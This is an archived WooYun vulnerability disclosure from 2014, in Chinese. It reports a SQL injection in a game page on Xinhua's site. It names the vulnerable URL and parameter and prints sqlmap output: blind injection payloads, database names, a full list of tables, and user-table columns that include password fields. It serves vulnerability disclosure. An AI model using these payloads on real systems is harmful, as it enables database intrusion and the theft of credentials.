乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-07: 细节已通知厂商并且等待厂商处理中 2014-10-11: 厂商已经确认,细节仅向厂商公开 2014-10-21: 细节向核心白帽子及相关领域专家公开 2014-10-31: 细节向普通白帽子公开 2014-11-10: 细节向实习白帽子公开 2014-11-21: 细节向公众公开
新华网某大型业务高危sql注射,全库泄露
新华网的游戏业务,全库泄露注射点:
http://game.news.cn/shouyou/game_details.jsp?gameid=33582
注射参数 : gameidsqlmap直接跑,ROOT权限
Place: GETParameter: gameid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: gameid=33582 AND 7873=7873 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: gameid=33582 AND SLEEP(5)---back-end DBMS: MySQL 5.0.11available databases [4]:[*] gpfxhw[*] information_schema[*] mysql[*] testcurrent database: 'gpfxhw'current user: 'root@localhost'Database: gpfxhw[237 tables]+---------------------------+| position || activitydownloadlog || activitypvlog || app_function || app_role || app_user || area || associator || associator_grade || associator_grade_log || backoutinfo || blacklist || blacklistmobile || brush_mobile || brush_number || brush_number_bak || cardcontent || cardgift || cardorder || cityip || citysort || clientpvlog || clientuvlog || cloginlog || collect || company || connectionorder || cpcooperateinfo || crandom || customer_comment || customerdailyrecord || department || dictionary || dictionary_type || downcountday || downcountlog || downcountmonth || downloaddetail || downloadlog || downloadlog_history || editorrecommend || errorcodeinfo || exchangegood || exchangegoodinfo || file_attach || firstactivelog || floworderreport || flowpackorder || flowpackorder_history || flowpackproduct || freeflowgamelog || freeflowgames || freeflowgamesorderway || game_hottag || gamecomment || gamedevelopers || gamefocus || gamegrade || gameinfo || gameintegration || gamelisttype || gamepackage || gamepackageorder || gamepackagesoft || gamepvlog || gameranklist || gamereport || gamereportorder || gamereportunsubscribe || gamescanresult || gamesdk || gamesearchdefault || gameseries || gamess || gamesubject || gamesubjectlog || gamesubjectsoft || gametag || gametypes || goodsinfo || gporder || gppayment || groupuserinfo || hotgame || info || infoypes || inputmobile || integrationinfo || iosdowncountlog || iosgameinfo || iosgamepvlog || iosgameuvlog || iplibrary || keyword || lnvacbatchlogs || lnvaccheckpricelogs || loginlog || lotterycount || lotteryinfo || mailbox || mediacard || minipayment || minipaymentdetail || mo || mo_history || mobileimsiid || mobilerandom || mobilesimimsi || mobilesimimsi_20140212 || momessage || mt || mt_history || mtcheckcountlog || mtcheckcountlog_history || mtids || mtprocess || myh5game || necessary || newdbsubifacelog || newpaymentreturnlog || newsdkpayment || numtable || orderfreeflowsdk || orderprop || orderrelationupdatenotify || orderremind || orders || p_channel || p_gameactivity || p_relation || p_rhythmmaster || p_scjzds_info || p_scjzds_singup || p_sms || p_summerwb || pagegameorders || pagegamepvlog || pagekeyword || pagepvchannel || pagepvlog || pagepvlog_historybak || pagepvlogmonth || pagepvprovincelog || pageuvlog || paychannel || paymentreturnlog || payrandom || paysdkcompany || paysdkgame || paysdkgametemp || paysdkparam || pcgamelog || pcgamepvlog || posterinfo || prepaidcards || promotion || promotionrecord || promotionrule || province || proxyinfo || push_channel || push_channelall || push_channeldetail || pushinfo || querygameinfo || question || qy_medal || qy_news || random || recommend || registertype || reservationmobile || role_fun || scoreexchange || scorelog || sdkchannel || sdkchanneltype || sdkchecklogs || sdkcooperation || sdkcooprel || sdkincome || sdkincome_province || sdkincomesmsdetail || sdkincomesmsdetail_old || sdkpayment || sdkpayment_history || sdkpaymentlog || sdksmslog || sdkversion || seriesbrand || sgipheart || sharelog || sharesmslog || sign || signintegration || sjinfo || smsbykflog || smscompanyinfo || smscporder || smscppayment || smscprelation || smskycallbacklog || smskylog || smskymolog || smskypaymentlog || smslogs || smsorderconf || smsorderconfbatch || smspayerrorlogs || smspayerrorlogs_history || smsproductinfo || smsreceive || smsspecialnumber || smszsmolog || smszspaymentlog || softgood || swpayment || swpaymentdetail || swtemp || swtempdel || sysinterfacecfg || sysparam || system_param || systeminfo || taxmanagement || thirdpayment || thirdpaymentdetail || timertaskresult || unicomsmslogs || useintegral || user_role || usermessage || usertable || vote || winprizeinfo || wochannel || wogameinfo |+---------------------------+Database: gpfxhwTable: app_user[26 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| accessionTime | datetime || addres | varchar(500) || channelid | varchar(3) || dep_id | bigint(20) || developerid | varchar(20) || developername | varchar(50) || edu_id | bigint(20) || email | varchar(100) || emailPassword | varchar(100) || fax | varchar(100) || file_id | bigint(20) || fullName | varchar(100) || leftFlag | int(11) || mobile | varchar(100) || password | varchar(100) || phone | varchar(100) || pos_id | bigint(20) || province | varchar(20) || remark | varchar(200) || sex | int(11) || status | int(11) || tellimit | int(11) || tralimit | int(11) || userId | bigint(20) || userName | varchar(100) || zip | varchar(100) |+---------------+--------------+
如上
自行修复
危害等级:高
漏洞Rank:10
确认时间:2014-10-11 17:13
暂无
